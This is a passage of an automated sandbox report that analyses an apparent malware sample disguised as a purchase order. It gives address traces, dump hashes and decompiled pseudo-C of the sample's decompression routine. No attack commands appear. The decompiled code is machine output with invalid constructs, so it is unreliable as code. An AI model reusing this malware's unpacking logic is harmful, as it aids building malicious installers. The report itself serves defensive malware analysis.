                                                                                                                          0x00406559
                                                                                                                          0x0040655d
                                                                                                                          0x00406560
                                                                                                                          0x00406566
                                                                                                                          0x00406568
                                                                                                                          0x00406568
                                                                                                                          0x00406568
                                                                                                                          0x0040656b
                                                                                                                          0x0040656e
                                                                                                                          0x0040656e
                                                                                                                          0x00406574
                                                                                                                          0x00406512
                                                                                                                          0x00406512
                                                                                                                          0x00406515
                                                                                                                          0x00000000
                                                                                                                          0x00406515
                                                                                                                          0x00406576
                                                                                                                          0x00406576
                                                                                                                          0x00406579
                                                                                                                          0x0040657c
                                                                                                                          0x0040657f
                                                                                                                          0x00406582
                                                                                                                          0x00406585
                                                                                                                          0x00406588
                                                                                                                          0x0040658b
                                                                                                                          0x0040658e
                                                                                                                          0x00406591
                                                                                                                          0x00406594
                                                                                                                          0x004065ac
                                                                                                                          0x004065af
                                                                                                                          0x004065b2
                                                                                                                          0x004065b5
                                                                                                                          0x004065b5
                                                                                                                          0x004065b8
                                                                                                                          0x004065bc
                                                                                                                          0x004065be
                                                                                                                          0x00406596
                                                                                                                          0x00406596
                                                                                                                          0x0040659e
                                                                                                                          0x004065a3
                                                                                                                          0x004065a5
                                                                                                                          0x004065a7
                                                                                                                          0x004065a7
                                                                                                                          0x004065c1
                                                                                                                          0x004065c8
                                                                                                                          0x004065cb
                                                                                                                          0x00000000
                                                                                                                          0x004065cd
                                                                                                                          0x00000000
                                                                                                                          0x004065cd
                                                                                                                          0x00000000
                                                                                                                          0x0040685a
                                                                                                                          0x0040685a
                                                                                                                          0x0040685e
                                                                                                                          0x00406b85
                                                                                                                          0x00000000
                                                                                                                          0x00406b85
                                                                                                                          0x00406864
                                                                                                                          0x00406867
                                                                                                                          0x0040686a
                                                                                                                          0x0040686e
                                                                                                                          0x00406871
                                                                                                                          0x00406877
                                                                                                                          0x00406879
                                                                                                                          0x00406879
                                                                                                                          0x00406879
                                                                                                                          0x0040687c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040662a
                                                                                                                          0x0040662a
                                                                                                                          0x0040662d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406969
                                                                                                                          0x0040696d
                                                                                                                          0x0040698f
                                                                                                                          0x00406992
                                                                                                                          0x0040699c
                                                                                                                          0x0040699f
                                                                                                                          0x0040699f
                                                                                                                          0x00000000
                                                                                                                          0x0040699f
                                                                                                                          0x0040696f
                                                                                                                          0x00406972
                                                                                                                          0x00406976
                                                                                                                          0x00406979
                                                                                                                          0x00406979
                                                                                                                          0x0040697c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406a26
                                                                                                                          0x00406a2a
                                                                                                                          0x00406a48
                                                                                                                          0x00406a48
                                                                                                                          0x00406a48
                                                                                                                          0x00406a4f
                                                                                                                          0x00406a56
                                                                                                                          0x00406a5d
                                                                                                                          0x00406a5d
                                                                                                                          0x00000000
                                                                                                                          0x00406a5d
                                                                                                                          0x00406a2c
                                                                                                                          0x00406a2f
                                                                                                                          0x00406a32
                                                                                                                          0x00406a35
                                                                                                                          0x00406a3c
                                                                                                                          0x00406980
                                                                                                                          0x00406980
                                                                                                                          0x00406983
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406b17
                                                                                                                          0x00406b1a
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406751
                                                                                                                          0x00406753
                                                                                                                          0x0040675a
                                                                                                                          0x0040675b
                                                                                                                          0x0040675d
                                                                                                                          0x00406760
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406768
                                                                                                                          0x0040676b
                                                                                                                          0x0040676e
                                                                                                                          0x00406770
                                                                                                                          0x00406772
                                                                                                                          0x00406772
                                                                                                                          0x00406773
                                                                                                                          0x00406776
                                                                                                                          0x0040677d
                                                                                                                          0x00406780
                                                                                                                          0x0040678e
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406a64
                                                                                                                          0x00406a64
                                                                                                                          0x00406a67
                                                                                                                          0x00406a6e
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406a73
                                                                                                                          0x00406a73
                                                                                                                          0x00406a77
                                                                                                                          0x00406baf
                                                                                                                          0x00000000
                                                                                                                          0x00406baf
                                                                                                                          0x00406a7d
                                                                                                                          0x00406a80
                                                                                                                          0x00406a83
                                                                                                                          0x00406a87
                                                                                                                          0x00406a8a
                                                                                                                          0x00406a90
                                                                                                                          0x00406a92
                                                                                                                          0x00406a92
                                                                                                                          0x00406a92
                                                                                                                          0x00406a95
                                                                                                                          0x00406a98
                                                                                                                          0x00406a98
                                                                                                                          0x00406a98
                                                                                                                          0x00406a98
                                                                                                                          0x00406a9b
                                                                                                                          0x00406a9b
                                                                                                                          0x00406a9f
                                                                                                                          0x00406aff
                                                                                                                          0x00406b02
                                                                                                                          0x00406b07
                                                                                                                          0x00406b08
                                                                                                                          0x00406b0a
                                                                                                                          0x00406b0c
                                                                                                                          0x00406b0f
                                                                                                                          0x00406a1b
                                                                                                                          0x00406a1b
                                                                                                                          0x00000000
                                                                                                                          0x00406a1b
                                                                                                                          0x00406aa1
                                                                                                                          0x00406aa7
                                                                                                                          0x00406aaa
                                                                                                                          0x00406aad
                                                                                                                          0x00406ab0
                                                                                                                          0x00406ab3
                                                                                                                          0x00406ab6
                                                                                                                          0x00406ab9
                                                                                                                          0x00406abc
                                                                                                                          0x00406abf
                                                                                                                          0x00406ac2
                                                                                                                          0x00406adb
                                                                                                                          0x00406ade
                                                                                                                          0x00406ae1
                                                                                                                          0x00406ae4
                                                                                                                          0x00406ae8
                                                                                                                          0x00406aea
                                                                                                                          0x00406aea
                                                                                                                          0x00406aeb
                                                                                                                          0x00406aee
                                                                                                                          0x00406ac4
                                                                                                                          0x00406ac4
                                                                                                                          0x00406acc
                                                                                                                          0x00406ad1
                                                                                                                          0x00406ad3
                                                                                                                          0x00406ad6
                                                                                                                          0x00406ad6
                                                                                                                          0x00406af1
                                                                                                                          0x00406af8
                                                                                                                          0x00000000
                                                                                                                          0x00406afa
                                                                                                                          0x00000000
                                                                                                                          0x00406afa
                                                                                                                          0x00000000
                                                                                                                          0x00406796
                                                                                                                          0x00406799
                                                                                                                          0x004067cf
                                                                                                                          0x004068ff
                                                                                                                          0x004068ff
                                                                                                                          0x004068ff
                                                                                                                          0x004068ff
                                                                                                                          0x00406902
                                                                                                                          0x00406902
                                                                                                                          0x00406905
                                                                                                                          0x00406907
                                                                                                                          0x00406b91
                                                                                                                          0x00000000
                                                                                                                          0x00406b91
                                                                                                                          0x0040690d
                                                                                                                          0x00406910
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406916
                                                                                                                          0x0040691a
                                                                                                                          0x0040691d
                                                                                                                          0x0040691d
                                                                                                                          0x0040691d
                                                                                                                          0x00000000
                                                                                                                          0x0040691d
                                                                                                                          0x0040679b
                                                                                                                          0x0040679d
                                                                                                                          0x0040679f
                                                                                                                          0x004067a1
                                                                                                                          0x004067a4
                                                                                                                          0x004067a5
                                                                                                                          0x004067a7
                                                                                                                          0x004067a9
                                                                                                                          0x004067ac
                                                                                                                          0x004067af
                                                                                                                          0x004067c5
                                                                                                                          0x004067ca
                                                                                                                          0x00406802
                                                                                                                          0x00406802
                                                                                                                          0x00406806
                                                                                                                          0x00406832
                                                                                                                          0x00406834
                                                                                                                          0x0040683b
                                                                                                                          0x0040683e
                                                                                                                          0x00406841
                                                                                                                          0x00406841
                                                                                                                          0x00406846
                                                                                                                          0x00406846
                                                                                                                          0x00406848
                                                                                                                          0x0040684b
                                                                                                                          0x00406852
                                                                                                                          0x00406855
                                                                                                                          0x00406882
                                                                                                                          0x00406882
                                                                                                                          0x00406885
                                                                                                                          0x00406888
                                                                                                                          0x004068fc
                                                                                                                          0x004068fc
                                                                                                                          0x004068fc
                                                                                                                          0x00000000
                                                                                                                          0x004068fc
                                                                                                                          0x0040688a
                                                                                                                          0x00406890
                                                                                                                          0x00406893
                                                                                                                          0x00406896
                                                                                                                          0x00406899
                                                                                                                          0x0040689c
                                                                                                                          0x0040689f
                                                                                                                          0x004068a2
                                                                                                                          0x004068a5
                                                                                                                          0x004068a8
                                                                                                                          0x004068ab
                                                                                                                          0x004068c4
                                                                                                                          0x004068c6
                                                                                                                          0x004068c9
                                                                                                                          0x004068ca
                                                                                                                          0x004068cd
                                                                                                                          0x004068cf
                                                                                                                          0x004068d2
                                                                                                                          0x004068d4
                                                                                                                          0x004068d6
                                                                                                                          0x004068d9
                                                                                                                          0x004068db
                                                                                                                          0x004068de
                                                                                                                          0x004068e2
                                                                                                                          0x004068e4
                                                                                                                          0x004068e4
                                                                                                                          0x004068e5
                                                                                                                          0x004068e8
                                                                                                                          0x004068eb
                                                                                                                          0x004068ad
                                                                                                                          0x004068ad
                                                                                                                          0x004068b5
                                                                                                                          0x004068ba
                                                                                                                          0x004068bc
                                                                                                                          0x004068bf
                                                                                                                          0x004068bf
                                                                                                                          0x004068ee
                                                                                                                          0x004068f5
                                                                                                                          0x0040687f
                                                                                                                          0x0040687f
                                                                                                                          0x0040687f
                                                                                                                          0x0040687f
                                                                                                                          0x00000000
                                                                                                                          0x004068f7
                                                                                                                          0x00000000
                                                                                                                          0x004068f7
                                                                                                                          0x004068f5
                                                                                                                          0x00406808
                                                                                                                          0x0040680b
                                                                                                                          0x0040680d
                                                                                                                          0x00406810
                                                                                                                          0x00406813
                                                                                                                          0x00406816
                                                                                                                          0x00406818
                                                                                                                          0x0040681b
                                                                                                                          0x0040681e
                                                                                                                          0x0040681e
                                                                                                                          0x00406821
                                                                                                                          0x00406821
                                                                                                                          0x00406824
                                                                                                                          0x0040682b
                                                                                                                          0x004067ff
                                                                                                                          0x004067ff
                                                                                                                          0x004067ff
                                                                                                                          0x004067ff
                                                                                                                          0x00000000
                                                                                                                          0x0040682d
                                                                                                                          0x00000000
                                                                                                                          0x0040682d
                                                                                                                          0x0040682b
                                                                                                                          0x004067b1
                                                                                                                          0x004067b4
                                                                                                                          0x004067b6
                                                                                                                          0x004067b9
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406518
                                                                                                                          0x00406518
                                                                                                                          0x0040651c
                                                                                                                          0x00406b61
                                                                                                                          0x00000000
                                                                                                                          0x00406b61
                                                                                                                          0x00406522
                                                                                                                          0x00406525
                                                                                                                          0x00406528
                                                                                                                          0x0040652b
                                                                                                                          0x0040652e
                                                                                                                          0x00406531
                                                                                                                          0x00406534
                                                                                                                          0x00406536
                                                                                                                          0x00406539
                                                                                                                          0x0040653c
                                                                                                                          0x0040653f
                                                                                                                          0x00406541
                                                                                                                          0x00406541
                                                                                                                          0x00406541
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004066a3
                                                                                                                          0x004066a3
                                                                                                                          0x004066a7
                                                                                                                          0x00406b6d
                                                                                                                          0x00000000
                                                                                                                          0x00406b6d
                                                                                                                          0x004066ad
                                                                                                                          0x004066b0
                                                                                                                          0x004066b3
                                                                                                                          0x004066b6
                                                                                                                          0x004066b8
                                                                                                                          0x004066b8
                                                                                                                          0x004066b8
                                                                                                                          0x004066bb
                                                                                                                          0x004066be
                                                                                                                          0x004066c1
                                                                                                                          0x004066c4
                                                                                                                          0x004066c7
                                                                                                                          0x004066ca
                                                                                                                          0x004066cb
                                                                                                                          0x004066cd
                                                                                                                          0x004066cd
                                                                                                                          0x004066cd
                                                                                                                          0x004066d0
                                                                                                                          0x004066d3
                                                                                                                          0x004066d6
                                                                                                                          0x004066d9
                                                                                                                          0x004066d9
                                                                                                                          0x004066d9
                                                                                                                          0x004066dc
                                                                                                                          0x004066de
                                                                                                                          0x004066de
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406920
                                                                                                                          0x00406920
                                                                                                                          0x00406920
                                                                                                                          0x00406924
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040692a
                                                                                                                          0x0040692d
                                                                                                                          0x00406930
                                                                                                                          0x00406933
                                                                                                                          0x00406935
                                                                                                                          0x00406935
                                                                                                                          0x00406935
                                                                                                                          0x00406938
                                                                                                                          0x0040693b
                                                                                                                          0x0040693e
                                                                                                                          0x00406941
                                                                                                                          0x00406944
                                                                                                                          0x00406947
                                                                                                                          0x00406948
                                                                                                                          0x0040694a
                                                                                                                          0x0040694a
                                                                                                                          0x0040694a
                                                                                                                          0x0040694d
                                                                                                                          0x00406950
                                                                                                                          0x00406953
                                                                                                                          0x00406956
                                                                                                                          0x00406959
                                                                                                                          0x0040695d
                                                                                                                          0x0040695f
                                                                                                                          0x00406962
                                                                                                                          0x00000000
                                                                                                                          0x00406964
                                                                                                                          0x004066e1
                                                                                                                          0x004066e1
                                                                                                                          0x00000000
                                                                                                                          0x004066e1
                                                                                                                          0x00406962
                                                                                                                          0x00406b97
                                                                                                                          0x00406bb9
                                                                                                                          0x00406bbf
                                                                                                                          0x00406bc1
                                                                                                                          0x00406bc8
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004061c6
                                                                                                                          0x00406bce
                                                                                                                          0x00406bce
                                                                                                                          0x00000000

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.311379785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.311367620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311403343.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311443229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311459049.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311508906.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311558346.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311574736.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_New PO-RJ-IN-003 - Knauf Queimados.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: a98843a46fb9b62412bae302801de079c6452d7d4a4e23dbd568dc37708913b5
                                                                                                                          • Instruction ID: a0ed0051221df213f48a7fa37d6c1b626956e64e776f215132b6db312d3b92b6
                                                                                                                          • Opcode Fuzzy Hash: a98843a46fb9b62412bae302801de079c6452d7d4a4e23dbd568dc37708913b5
                                                                                                                          • Instruction Fuzzy Hash: 10816671D04228DBDF24CFA8C8447ADBBB0FB45301F1181AAD856BB281D7786A96DF44
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 004065D2 Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 98%
                                                                                                                          			E004065D2() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M00406BD6))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8));
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
